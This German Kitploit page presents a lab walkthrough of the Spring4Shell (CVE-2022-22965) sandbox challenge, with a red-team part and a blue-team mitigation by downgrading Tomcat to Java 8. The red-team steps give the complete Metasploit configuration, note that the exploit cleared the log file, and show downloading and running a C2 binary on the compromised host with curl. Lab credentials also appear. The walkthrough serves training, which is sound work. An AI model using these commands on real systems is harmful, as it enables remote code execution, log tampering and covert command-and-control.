Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Sandbox-Challenge-Spring4Shell-CVE-2022-22965- — Schritt-für-Schritt-Anleitung zur Ausnutzung von CVE-2022-22965 (Spring4Shell) mit Metasploit, Bereitstellung eines C2-Listeners und Eindämmung der Schwachstelle durch Downgrade auf Java 8 auf einem Tomcat-Server. | Kitploit
Tools/GitHubGitHub/felisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsCommand and ControlLernen & BildungRed TeamingLabs & Praxis
GitHubfelisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-

Sandbox-Challenge-Spring4Shell-CVE-2022-22965-

Schritt-für-Schritt-Anleitung zur Ausnutzung von CVE-2022-22965 (Spring4Shell) mit Metasploit, Bereitstellung eines C2-Listeners und Eindämmung der Schwachstelle durch Downgrade auf Java 8 auf einem Tomcat-Server.

Repository anzeigen
14vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Spring4Shell-Bedrohungs-Sandbox (CVE-2022-22965)

Übersicht

Dieser Walkthrough dokumentiert den Abschluss der Sandbox Challenge, die sich auf CVE-2022-22965 konzentriert, allgemein bekannt als Spring4Shell – eine kritische (CVSS 9.8/10) Remote-Code-Ausführungs-Sicherheitslücke, die bestimmte Versionen des Spring Java-Frameworks betrifft. Die Challenge deckt sowohl offensive (Red Team) als auch defensive (Blue Team) Perspektiven der Sicherheitslücke ab.

Hinweis: Befehle und Dateipfade in diesem Walkthrough spiegeln die spezifische Umgebung wider, die bei diesem Versuch verwendet wurde. Ihre Umgebung kann abweichen – passen Sie Pfade, IP-Adressen und Dateinamen entsprechend an.


Umgebung

MaschineIP-AdresseRolle
Security-Desk (Kali Linux)172.16.200.12Angriffs- und Arbeitsmaschine
Rotes Ziel (Linux)172.16.100.90Ausbeutungsziel
Blaues Ziel (Linux)172.16.100.100Härtungsziel

Anmeldedaten: playerone / password123


Red-Team-Ziel: C2-Listener auf dem roten Ziel bereitstellen

Schritt 1 – Das Ziel identifizieren

Überprüfte den Reiter Netzwerkkarte im Challenge-Panel, um die IP des roten Ziels (172.16.100.90) zu bestätigen. Verwendete curl, um die auf Port 80 laufende Webanwendung zu inspizieren:

root@kitploit:~
curl http://172.16.100.90

Die Ausgabe zeigte Apache Tomcat 9.0.59 mit einer Weiterleitung nach /dasmsp. Durchsuchte den Seitenquelltext, um einen POST-Formular-Endpunkt unter /dasmsp/contact zu identifizieren.

Schritt 2 – Metasploit starten und den Exploit konfigurieren

root@kitploit:~
msfconsole
root@kitploit:~
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run

Der Exploit erzeugte erfolgreich eine JSP-Shell, modifizierte den Class Loader, leerte die Logdatei und öffnete eine Befehls-Shell-Sitzung auf dem roten Ziel.

Schritt 3 – Eine interaktive Shell erhalten

Nachdem die Sitzung geöffnet wurde, gab shell ein, um auf eine interaktive Shell zu wechseln. Metasploit fand /usr/bin/script auf dem Ziel und verwendete es, um eine interaktive Shell als Benutzer tomcat zu öffnen.

Schritt 4 – deploy_c2 übertragen und ausführen

Die Binärdatei deploy_c2 befand sich auf dem Security-Desk, nicht auf dem roten Ziel. HOST-Server mittels Python3 HTTP-Server auf dem Security-Desk:

root@kitploit:~
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080

Heruntergeladen und ausgeführt innerhalb der Shell-Sitzung des roten Ziels:

root@kitploit:~
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

Ausgabe bestätigte: Done! – C2-Listener erfolgreich auf dem roten Ziel bereitgestellt.


Blue-Team-Ziel: CVE-2022-22965 auf dem blauen Ziel entschärfen (Downgrade auf Java 8)

Schritt 1 – SSH zum blauen Ziel

Vom Security-Desk-Terminal aus:

root@kitploit:~
ssh [email protected]

Passwort: password123

Schritt 2 – Java 8-Pakete zum blauen Ziel übertragen

Die Java 8 .deb-Pakete befanden sich auf dem Security-Desk unter /home/playerone/Desktop/Resources/. Übertragen Sie sie mit SCP von einem Security-Desk-Terminal zum blauen Ziel:

root@kitploit:~
scp /home/playerone/Desktop/Resources/*.deb [email protected]:/tmp/

Übertragene Pakete:

  • adoptium-ca-certificates_1.0.2-1_all.deb
  • fonts-dejavu_2.37-6_all.deb
  • p11-kit-modules_0.24.1-2_amd64.deb
  • p11-kit_0.24.1-2_amd64.deb
  • temurin-8-jdk_8.0.402.0.0+6_amd64.deb

Schritt 3 – Java 8-Pakete installieren

In der SSH-Sitzung des blauen Ziels:

root@kitploit:~
sudo dpkg -i /tmp/*.deb

Schritt 4 – Java 8 als Standard setzen (Workaround für bekanntes Problem)

Aufgrund eines bekannten Problems in der Challenge wird die Überprüfung nicht korrekt registriert, ohne Java 8 manuell als Standard zu setzen:

root@kitploit:~
sudo update-alternatives --config java

Wählte Option 2 — /usr/lib/jvm/temurin-8-jdk-amd64/bin/java.

Schritt 5 – Den Tomcat-Dienst aktualisieren, um Java 8 zu verwenden

Inspizierte die Tomcat-Dienst-Unit-Datei:

root@kitploit:~
cat /etc/systemd/system/tomcat.service

Bearbeitete die Datei, um die Umgebungsvariable JAVA_HOME zu aktualisieren:

root@kitploit:~
sudo nano /etc/systemd/system/tomcat.service

Geändert:

root@kitploit:~
Environment="JAVA_HOME=/usr"

Zu:

root@kitploit:~
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"

Schritt 6 – Tomcat neu laden und neu starten

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart tomcat

Die Überprüfung 'CVE-2022-22965 entschärft auf blauem Ziel' wurde im Challenge-Panel grün.


Verwendete Werkzeuge

  • Metasploit Framework (Modul spring_framework_rce_spring4shell)
  • curl
  • Python3 HTTP-Server
  • SSH / SCP
  • dpkg
  • systemctl
  • update-alternatives
  • nano
Tool herunterladen